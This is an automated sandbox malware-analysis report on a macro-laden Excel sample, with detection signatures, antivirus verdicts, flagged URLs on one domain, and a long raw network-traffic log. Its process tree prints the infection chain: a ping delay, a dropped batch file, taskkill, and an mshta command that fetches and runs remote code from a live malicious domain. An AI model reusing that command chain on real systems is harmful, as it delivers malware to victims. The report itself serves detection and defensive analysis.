Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.Siggen3.17149.4489.28684

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.17149.4489.28684 (renamed file extension from 28684 to xls)
Analysis ID:684696
MD5:a5589d03da5b07fa9b035921b38ba29f
SHA1:3468f6de4c2f018812c4393bffdc336ce8b73848
SHA256:1f60b1d80f74e60f61191fa9867de7b95cf5f0df6ae545aab006ddd983eb467d
Tags:xlsx
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Installs a global mouse hook
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1236 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1796 cmdline: cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • PING.EXE (PID: 2928 cmdline: ping -n 8 127.0.0.1 MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
      • cmd.exe (PID: 676 cmdline: cmd /c start /min taskkill /f /im WINWORD.EXE MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • taskkill.exe (PID: 1440 cmdline: taskkill /f /im WINWORD.EXE MD5: 3722FA501DCB50AE42818F9034906891)
      • mshta.exe (PID: 1992 cmdline: mshta http://facextrade.com.br/wp-includes/certificates/4.txt MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsVirustotal: Detection: 49%Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsMetadefender: Detection: 29%Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsReversingLabs: Detection: 41%
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsAvira: detected
Antivirus detection for URL or domain
Source: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.60C;Avira URL Cloud: Label: malware
Source: https://facextrade.com.br/feed/atom/YAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextraAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0ET4.0E)reAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.21.2.1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/main-style.css.css?ver=4.9.204.9.201.2.8.1241Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204179Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/favicon.icoAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/aeAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0http://facextrade.comAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/xmlrpc.phpaAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.019Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1laAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.pngAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6iAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0PAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg.0=1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0C:Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6ver=2.3.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3-USAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2iiAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)ferrAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/privacy-policyflateCAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30E)nsla#Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0ET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css.9.20ive.css.NET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)&Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)JAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.40ET4.0E)0=Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.dAvira URL Cloud: Label: malware
Source: https://facextrade.com.br/feed/Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3er=1.0.Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.200.NET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20authorAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/xmlrpc.phpAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.04.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3C:Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/wlwmanifest.xmlAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txt...3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/privacy-policyng4Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.jsAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png$Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.cssAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txtmshtaAvira URL Cloud: Label: malware
Source: https://facextrade.com.br/P/1.1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)hAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0=1.06_paiAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0.NET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txtsmshtaAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0SAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txt#DAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2PAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/style.cssBnAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?verAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.00E)HlAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssstrAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3.0ksAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txtcyAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: facextrade.com.brVirustotal: Detection: 5%Perma Link
Machine Learning detection for sample
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49178 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\Outlook.batJump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
Source: global trafficDNS query: name: facextrade.com.br
Source: global trafficDNS query: name: facextrade.com.br
Source: global trafficDNS query: name: netdna.bootstrapcdn.com
Source: global trafficDNS query: name: translate.google.com
Source: global trafficDNS query: name: storage.ie6countdown.com
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 142.250.181.238:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 142.250.181.238:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
